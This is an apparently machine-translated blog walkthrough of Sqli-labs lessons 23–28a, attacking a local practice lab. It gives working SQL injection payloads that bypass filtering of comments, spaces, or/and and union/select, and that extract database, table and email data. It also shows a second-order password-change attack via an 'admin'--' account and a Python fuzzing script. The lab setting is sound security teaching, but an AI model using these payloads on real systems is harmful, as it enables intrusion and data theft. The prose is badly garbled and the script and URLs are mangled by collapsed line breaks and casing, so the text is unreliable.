This article link: http://blog.csdn.net/u012763794/article/details/51457142
This time I came again, advanced injections (the Advanced challenge), is some filter bypass things, the basic challenge to see this two
Recently the reverse hack went, http://www.giantbranch.cn/myblog/?p=27, so this dragged too long, completed today
Learning SQL injection through Sqli-labs-the less1-10 of fundamental challenges
http://blog.csdn.net/u012763794/article/details/51207833
Learning SQL injection through Sqli-labs-the less11-22 of fundamental challenges
http://blog.csdn.net/u012763794/article/details/51361152
First of all how to determine what the filter, we have to look at the problem, we can proceed to the next round of operation
Less get-error Based-strip Comments (Error-based, filtered comment GET type) First single quote, error
Add a%23 (#的url编码), for #,get to URL encoding, post submission is not necessary, this can look at the previous two articles
Then we can know that background PHP replaces # with empty because there are no gaps between the two single quotes
This doesn't work, so--one-line comment, because we're going to add a space or some other character to it, and the single-line comment works.
We can see the error here only the original statement limit in front of the single quotation mark, because we add a space, so that it and we add a single quotation mark separated by a space, we add the single quotation mark with the previous match no error, only quoted a single quote, contrast Less1 We know the filter-, Replaced with empty
Here's a comparison of no spaces
is Less1 , only to the back of the single quote error, because the single quotation mark and the front of the id= ' 1 ' was--separate, the front single quotation marks are matched, will not show the error
For LESS23, the judgment here is more obvious, there is no gap between the two single quotes, so it must be replaced by a null character.
Let's look at the source code, that's true.
Then summarize how to judge the comment filter, the specific filter into what will be the wrong message
#: Add a single quote, double quotes, etc.
--: This is also, directly add single quotation marks, double quotation marks, and then add a--, no space behind (because--when the comment is valid, there will be a space or other characters before the line, here to determine the filter is not necessary)
Then you can only close the bypass, multi-line comment is not like
Extracting data or something like two of less 1.
Less-24-second degree injections *real treat*-store injections (two injections) landing a look, is a complete registration login, password change site, a look at the root directory, there are indeed many files
By registering login above to understand the process, we will audit each file, we can start from index.php, actually have to interact with the database on the login_create.php,login.php,pass_change.php these three files
login.php (Files processed for login), filtering the user and password
login_create.php (files that are processed for new users)
$username = mysql_escape_string ($_post[' username '); $pass = mysql_escape_string ($_post[' password '); $re _pass= Mysql_escape_string ($_post[' Re_password ');
Three fields were filtered,
By the pass_change.php, we'll have a harvest.
When the change password is found, it gets directly from the session without any filtering, and once my username has an annotation, I can change someone else's password.
Then we'll just create a new special user and change the password.
The following is an example of admin (account: admin '--Password: ASDF)
After registering to see if the database has
So the user name is not a comment, we log in to change the password, in order to facilitate the viewing effect, I add the output SQL statement in PHP
Look at the database, it's really changed.
may have the reunion asks, when registering the time not to be filtered the single quotation mark?
Yes, we admin '--turned into admin\ '--,
This makes the admin\ '--the left and right single quotes match correctly, but when it is stored in the database he is a single quotation mark Ah, (escaping just temporarily here makes it lose the effect of single quotes, but it still represents single quotes)
Of course, new users here
Admin ' # is also possible
Less Trick with or & and (filtered or and and)
Confirm single quote character injection http://localhost/sqli-labs/Less-25/?id=1 ' judgment filtered or, with Less1 comparison error can be inferred http://localhost/sqli-labs/Less-25/?id=1 ' Or1
Or cut a picture, the first one is Less1, the second figure is LESS25
Similarly
Judging filtered andhttp://localhost/sqli-labs/less-25/?id=1 ' and1
Re-analysis under the source code, opened the I-mode match, case is not spare, we can use or and and the corresponding mathematical symbols to inject
Use && to UrlEncode to the backstage
And, of course, double-write bypass.
Http://localhost/sqli-labs/Less-25/?id=1 ' Oorr ' 1 ' = ' 1http://localhost/sqli-labs/less-25/?id=1 ' anandd ' 1 ' = ' 1
Less 25a Trick with or & and Blind (Blind filter of OR and and) so how does the blind Judge filter and and or, and add or OR and directly before
The code of this problem is the same as above, but here is the error is closed, so here only to judge
Less than Trick with comments and space (injected with comments and spaces filtered)
Confirm Filter #http://localhost/sqli-labs/less-26/?id=%231 Confirm Filter orhttp://localhost/sqli-labs/less-26/?id= Or1 Confirm Filter Multiline Comment http://localhost/sqli-labs/less-26/?id=/*1 confirm filter A single line comment http://localhost/sqli-labs/Less-26/confirm filter Slash HTTP ://LOCALHOST/SQLI-LABS/LESS-26/?ID=/1 confirm Filter the backslash Http://localhost/sqli-labs/Less-26/?id=1 confirm filter the space, error injection just OK Oh, this judge http ://localhost/sqli-labs/less-26/?id=1 "
Really tired Ah, the following look at the source code, I am looking at the source confirmation, so confirm filter what is still relatively tired
The following look around, look at the difficult to go around, this time to extract the complete data bar, we often bypass the space is a multi-line comment,/**/but here filter, so this does not work, the following try wide-byte trick to see can replace the space, can see found can oh, then there is no other, Write a script to run and know (but a little pity ..., but still a little bit)
The script is as follows:
#-*-Coding:utf8-*-"" " @version: @author: Giantbranch@file:testsqli.py@time:2016/5/29 23:14" "" Import Requestsdef Changetohex (num): TMP = Hex (i). replace ("0x", "") If Len (tmp) <2:tmp = ' 0 ' + tmpreturn "%" + Tmpreq = requests. Session () for I in Xrange (0,256): i = Changetohex (i) url = "Http://localhost/sqli-labs/Less-26/?id=1" + i + "%26%26" + i + "' 1 ' = ' 1" ret = req.get (URL) If ' Dumb ' in Ret.content:print "Good,this can use:" + I
Run results
I picked the first 09 to see, found in addition to%a0 other can not replace the space, a little sad ah, in fact, we found that in addition to%A0, basically are filtered characters, such as%20 (space),%23 (pound),%2a (asterisk)%2d (minus)%2f (slash)%5c (backslash), as for%09- %0d are what tabs, line breaks, page breaks and so on, is also a space bar, which can also find out what the program filter the original, pass not universal still need to test practice, retrofit estimate can find out what the program filtered
Then we can use%a0 instead of spaces.
Full payload:
Confirm Number of fields http://localhost/sqli-labs/Less-26/?id=0%27union%a0select%a01,2,3,4%a0%26%26%a0%271%27=%271http:// localhost/sqli-labs/less-26/?id=0%27union%a0select%a01,2,3%a0%26%26%a0%271%27=%271 gets the database currently in use http://localhost/ Sqli-labs/less-26/?id=0%27union%a0select%a01,database (), 3%a0%26%26%a0%271%27=%271 get table information http://localhost/ SQLI-LABS/LESS-26/?ID=0%27UNION%A0SELECT%A01,GROUP_CONCAT (table_name), 3%a0from%a0infoorrmation_schema.tables% A0where%a0table_schema= ' security '%26%26%a0%271%27=%271 get column information http://localhost/sqli-labs/Less-26/?id=0%27union% A0select%a01,group_concat (column_name), 3%a0from%a0infoorrmation_schema.columns%a0where%a0table_schema= ' Security '%a0anandd%a0table_name= ' emails '%26%26%a0%271%27=%271 finally obtained the data, found not to extract http://localhost/sqli-labs/Less-26/? id=0%27%a0union%a0select%a01,email_id,3%a0from%a0emails%26%26%a0%271%27=%271
Why the table columns are extracted, the data can not be extracted, error report I collapsed, this temporarily put, first next lesson, know can tell me
Update No. 6.1: Finally know how to extract data, the above syntax is really wrong, give two
Http://localhost/sqli-labs/Less-26/?id=0%27%a0union%a0select%a01,group_concat (email_id), 3%a0from%a0emails% A0union%a0select (1), 2, ' 3
Http://localhost/sqli-labs/Less-26/?id=0%27%a0union%a0select%a01,group_concat (email_id), 3%a0from%a0emails% a0where%a0%271%27=%271
Less 26a get-blind based-all your SPACES and COMMENTS belong to us (blinds with whitespace and annotations filtered)
This is similar to the above, but there will not be an error, then the decision to filter what is basically like above, here according to the return of the page has data or no data
But there is another question, how to distinguish whether he is filtered or forced into plastic, a picture let you know
As you can see, because the first character is not a digital intval directly converted to 0, and when filtered, then the id= #1就是正常的id =1 ID.
Less get-error based-all your union & Select belong to us (filter for union and select)
The old adage, judging as a single citation sizes
Http://localhost/sqli-labs/Less-27/?id=1 '
Find also filter spaces
The specific judgment with 26 almost, union and select to see the following judgment filter, change can judge double write, the size of the line is not
Http://localhost/sqli-labs/Less-27/?id=select1http://localhost/sqli-labs/Less-27/?id=union1
Take a look at the filter bar, multi-line comments, single-line comments, space-case unions and select
Directly on the payload
Http://localhost/sqli-labs/Less-27/?id= '%a0union%a0select (1), (Database ()), (3) or (1) = ' 1 exploded database http://localhost /sqli-labs/less-27/?id= '%a0union%a0select (1), (GROUP_CONCAT (table_name)), (3)%a0from%a0information_schema.tables %a0where%a0table_schema= ' security '%26%26%a0%271%27=%271 http://localhost/sqli-labs/Less-27/?id= '%a0union %a0select (1), Group_concat (column_name), 3%a0from%a0information_schema.columns%a0where%a0table_schema= ' security ' %a0%26%26%a0table_name= ' emails '%26%26%a0%271%27=%271 burst http://localhost/sqli-labs/Less-27/?id= '%a0union% A0select (1), Group_concat (email_id), 3%a0from%a0emails%a0union%a0select (1), 2, ' 3 extract data
Less 27a Get-blind Based-all your UNION & SELECT belong to us
This is the blind version of less 27, the double-cited sizes
Http://localhost/sqli-labs/Less-27a/?id=1 "or" 1 "=" 1
Let's give the payload of the blinds,
Judge the length of the database name, in fact, just deformed a bit, the principle is no different from the previous blinds,
Less Get-error Based-all your UNION & SELECT belong to us String-single quote with parenthesis based on incorrect, enclosed single-quote character type, over Filter the injection of union and select, etc.
Just look at the code, because it's similar to the course above.
That I is the pattern that is being matched, I is ignoring the case, \s is matching any whitespace character, tab, newline, space ah etc, then we can bypass the middle without space
Let's just use%a0.
Finally, the payload of extracting data
http://localhost/sqli-labs/Less-28/?id=0%27)%a0union%a0select%a01,group_concat (email_id), 3%a0from%a0emails% A0WHERE%A0 (%271%27=%271
Less 28a get-bind based-all your UNION & SELECT belong to us String-single quote with parenthesis based on blind, parenthesized single quote character type, over Filter the injection of union and select, etc.
The author has commented out the front, so let's get rid of the notes, or we won't be challenged.
This is the last blind, with the basics, not to mention too much.
Since this is the last lesson, give a concrete payload bar, explosion database, first look at the name length, and then look at each character, there is a length to know how many times it
Length is 8http://localhost/sqli-labs/less-28a/?id=1 ') and (length (Database ()) >7) and (' 1 ') = (' 1http://localhost/ Sqli-labs/less-28a/?id=1 ') and (length (Database ()) >8) and (' 1 ') = (' 1 The first character is 115, i.e. shttp://localhost/sqli-labs/ Less-28a/?id=1 ') and (ASCII (SUBSTR ((Select%a0database ())) >114) and (' 1 ') = (' 1http://localhost/sqli-labs/ Less-28a/?id=1 ') and (ASCII (SUBSTR ((Select%a0database ())) >115) and (' 1 ') = (' 1
OK, next time continue to challenge 29-38 lessons, refueling!!! And look forward to encouraging me to speed up the progress below
This article link: http://blog.csdn.net/u012763794/article/details/51457142
Learning SQL injection through Sqli-labs--the less23-28a of advanced challenges